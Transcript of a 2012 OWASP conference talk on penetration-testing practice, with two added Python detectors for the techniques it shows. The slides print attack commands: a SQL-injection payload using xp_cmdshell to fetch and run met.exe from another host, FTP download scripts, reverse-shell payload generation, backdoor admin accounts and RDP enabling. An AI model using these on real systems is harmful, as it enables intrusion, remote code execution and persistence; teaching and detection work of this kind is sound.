This talk is about solving the practical challenges faced during pen-testing and exploitation. It will help you understand how this can be done efficiently and will explore various tips and tricks along the way. It tries to answer common questions like:
0. How do I prepare? What kind of tools should I have?
1. How do I scan the entire network faster?
2. How can I get more accurate results from scanning and fingerprinting?
3. Nessus says it is vulnerable, but how can I exploit it?
4. What if I know it is vulnerable but I don’t have any exploit available?
5. I am inside the box and have compromised it; now what do I do?
In short, it will show you the pain points of a typical pen-testing exercise and how to deal with them, and will help you reach “42”, the answer to life, the universe and everything.
Public exploit held private : Penetration Testing the researcher’s way
1. OWASP InfoSec India Conference 2012
August 24th – 25th, 2012, The OWASP Foundation
Hotel Crowne Plaza, Gurgaon
http://www.owasp.org
http://www.owasp.in
Public exploit held private : Penetration Testing the researcher’s way
Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. DISCLAIMER!
This presentation contains material on the evolution of a pen tester that is based solely on the perspective of the speaker and might contradict the opinions of individuals.
All the scenarios explained here are fictional, even though they might resemble realistic situations.
Even though no harm is intended, if it causes you any spiritual and/or physical discomfort, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that.
3. Setting the context
Why Pentesting?
How do you do it?
To VA or to PT… That’s the question.
4. Setting the context
Terminologies
Vulnerability
Exploit
Payload
Reverse shell
5. Basics
Pentesting
Internal
External
Automated -> review the report -> get the final report
Manual -> run a few basic tools -> get the report done
6. Basics…
Pentesting Steps
Recon and Scanning
Exploit
Maintain Access
Clean up
7. Scanning
Why?
Identify the live hosts
OS fingerprinting
Service fingerprinting
8. Scanning
Desi Jugaad
Ping sweep / shell scripts
Decent tools (But indecent usage)
NMAP (behold the power of NSE)
Others?
9. Desi Jugaad (Local Hack)
Ping Sweep
Windows
FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply"
Linux
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
done
10. Scanning
Problem!
It is taking too long to scan, and I need to go for lunch…
Is it really a Windows box that looks like a Linux box? Or which version is it?
13. Nmap Scripts
• Shared files and folders
• nmap --script=smb-enum-shares 192.168.80.129
• Check for SMB vulnerabilities
• nmap --script=smb-check-vulns 192.168.80.129
• Scan for machines that use the default MS SQL username and password
• nmap --script=ms-sql-info 192.168.80.129
14. Scanning
I have Nessus. Why go through so much pain?
I don’t have Nessus. What do I do?
15. Exploit
Motive
To gain access
Data
Command execution
Destroy everything!
Categories
Service level
OS
16. Exploit
What to exploit?
FTP?
HTTP?
SNMP?
What else?
17. Exploit
FTP
Server Exploit – Buffer Overflow
Fuzzing???
Bruteforce
SNMP
What to do?
18. FTP Tips
Windows
echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
19. FTP Tips
Linux
echo quote user ftp > ftp.txt
echo quote pass ftp >> ftp.txt
echo verbose >> ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt | ftp -n 192.168.12.124
20. Exploit
HTTP
Server Exploit
Command Execution
Web Shells
SQLi
22. SQLi Tips
' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye>> ftpmet.txt';exec master..xp_cmdshell 'ftp -s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';--
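The staging pattern on slides 18, 19 and 22 (an FTP command script assembled one echo at a time and then driven non-interactively, here as children of xp_cmdshell) is also what a defender can hunt for in process-creation telemetry. The following is an added example, not from the deck or its author; the event field names and the sample events are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed process-creation telemetry (EDR / Sysmon event 1 style), not from the slides.
# It replays the chain shown in the deck: xp_cmdshell children of sqlservr.exe build an
# FTP script line by line with echo, then run it with ftp -s:.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "sql01", "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "cmdline": "cmd.exe /c echo open 192.168.12.124> ftpmet.txt"},
    {"host": "sql01", "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "cmdline": "cmd.exe /c echo get met.exe>> ftpmet.txt"},
    {"host": "sql01", "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "cmdline": "cmd.exe /c ftp -s:ftpmet.txt"},
    # Benign: an admin running a scripted FTP transfer from an interactive session.
    {"host": "fs02", "parent": r"C:\Windows\explorer.exe", "cmdline": "ftp -s:backup.txt"},
]

FTP_VERBS = {"open", "user", "pass", "get", "put", "bin", "binary", "bye", "quit", "quote"}
ECHO_RE = re.compile(r"\becho\s+(.+?)\s*>>?\s*(\S+)", re.IGNORECASE)
FTP_RE = re.compile(r"\bftp(?:\.exe)?\b.*?-s:(\S+)", re.IGNORECASE)
DB_PARENTS = ("sqlservr.exe",)  # xp_cmdshell spawns cmd.exe as a child of the SQL Server service


def detect_ftp_staging(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag ftp -s:<file> runs where <file> was assembled with echo redirection of FTP
    commands on the same host, or where ftp was launched under the database service."""
    staged: Dict[tuple, set] = {}  # (host, script file) -> FTP verbs written into it
    findings = []
    for ev in events:
        host, cmd = ev["host"], ev["cmdline"]
        from_db = ev["parent"].lower().endswith(DB_PARENTS)
        echo = ECHO_RE.search(cmd)
        if echo:
            verb = echo.group(1).split()[0].lower()
            if verb in FTP_VERBS:
                staged.setdefault((host, echo.group(2).lower()), set()).add(verb)
            continue
        run = FTP_RE.search(cmd)
        if run:
            verbs = staged.get((host, run.group(1).lower()), set())
            if verbs or from_db:  # scripted ftp alone is routine; the staging or the parent is not
                findings.append({"host": host, "script": run.group(1), "verbs": sorted(verbs),
                                 "via_xp_cmdshell": from_db,
                                 "severity": "high" if from_db else "medium"})
    return findings


if __name__ == "__main__":
    for finding in detect_ftp_staging(SAMPLE_EVENTS):
        print(finding)
```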
23. SQLi Tips
MySQL non-interactive
mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO DUMPFILE '/tmp/passwd';"
24. Exploit
Metasploit
Use Exploit
Set payload
exploit
Any other options?
How about writing your own exploit (in your free time)? (out of scope)
25. L33t love story
Exploit’s love letter to the machine
PAYLOAD…
Which courier?
MSF – set payload
Custom program – msfpayload
Bad characters
Executable - msfpayload
26. Payload Generator
meterpreter msfpayload
Options:
./msfpayload windows/meterpreter/reverse_tcp O
Create exe:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
Generate shellcode:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C
27. From msf:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.40
set LPORT 80
show options
exploit
28. Exploit
I am in, what to do?
Secure access?
Add user
Open a port
I like it the reverse way
meterpreter
Dude, did you get root/admin access?
29. Add User
Windows Shell
net user hacker hacker123 /add
net localgroup administrators hacker /add
Meterpreter
use incognito
add_user hacker hacker123
add_localgroup_user Administrators hacker
RDP enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
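Each step on this slide leaves a Windows event behind: the account creation (Security 4720), the addition to the local Administrators group (Security 4732), and the registry write that clears fDenyTSConnections (recorded by Sysmon as event 13). As an added example that is not part of the deck, this correlates the three per host within a time window; the event dictionaries and their field names are constructed for this illustration.

```python
from collections import defaultdict
from typing import Dict, List

WINDOW_SECONDS = 600  # how long after account creation the follow-up steps still count
RDP_KEY_SUFFIX = r"\control\terminal server\fdenytsconnections"

# Constructed events, not from the slides: Security log 4720 (user created) and 4732 (member
# added to a local group) plus a Sysmon event 13 (registry value set). Field names are this
# example's own simplification; "time" is epoch seconds.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"host": "web01", "time": 1000, "event_id": 4720, "subject": "svc_web", "target": "hacker"},
    {"host": "web01", "time": 1004, "event_id": 4732, "group": "Administrators", "member": "hacker"},
    {"host": "web01", "time": 1011, "event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "value": "DWORD (0x00000000)"},  # Sysmon's Details format for a DWORD write of 0
    # Benign: helpdesk creates a standard user and nothing else happens within the window.
    {"host": "hr03", "time": 2000, "event_id": 4720, "subject": "helpdesk", "target": "j.doe"},
]


def correlate_backdoor_accounts(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """For each account creation, look within WINDOW_SECONDS on the same host for the two
    follow-ups the deck shows: adding the account to Administrators and clearing
    fDenyTSConnections (enabling RDP). Either alone is medium, both together are high."""
    by_host: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host[str(ev["host"])].append(ev)
    findings = []
    for host, evs in by_host.items():
        for created in (e for e in evs if e["event_id"] == 4720):
            acct = str(created["target"]).lower()
            t0 = created["time"]
            window = [e for e in evs if t0 <= e["time"] <= t0 + WINDOW_SECONDS]
            admin = any(e["event_id"] == 4732 and str(e.get("group", "")).lower() == "administrators"
                        and str(e.get("member", "")).lower() == acct for e in window)
            rdp = any(e["event_id"] == 13 and str(e.get("key", "")).lower().endswith(RDP_KEY_SUFFIX)
                      and str(e.get("value", "")).endswith("(0x00000000)") for e in window)
            if admin or rdp:
                findings.append({"host": host, "account": created["target"],
                                 "created_by": created["subject"], "local_admin": admin,
                                 "rdp_enabled": rdp, "severity": "high" if admin and rdp else "medium"})
    return findings


if __name__ == "__main__":
    for finding in correlate_backdoor_accounts(SAMPLE_EVENTS):
        print(finding)
```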
30. Privilege Escalation
Categories
Service level
OS
Problem!
How can I transfer my exploit there?
Netcat
FTP
31. Kernel Exploits
Linux Kernel <= 2.6.36-rc8 http://www.exploit-db.com/exploits/15285/
Linux Kernel 2.4/2.6 http://www.exploit-db.com/exploits/9545/
Linux Kernel 2.6 http://www.exploit-db.com/exploits/8478/
Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/
32. Windows Exploits
Windows Vista, 7, 2008 http://www.exploit-db.com/exploits/15609/
Windows XP, 2003 http://www.exploit-db.com/exploits/18176/
Linux + NT priv esc http://www.exploit-db.com/exploits/9301/
Windows XP SP2, SP3 http://www.exploit-db.com/exploits/9301/
33. Pivoting…
Huh?
Why do I need it?
How do I do it?
nc + port forwarding
Ssh tunneling
34. Fuzzing…
My favorite, but the last thing I prefer to do on my own
Python rocks!
Basic
Advanced
SEH handler
Egg hunting shellcode
35. Did I miss anything?
Questions
Perspectives
Comments
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
36. Thank you
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu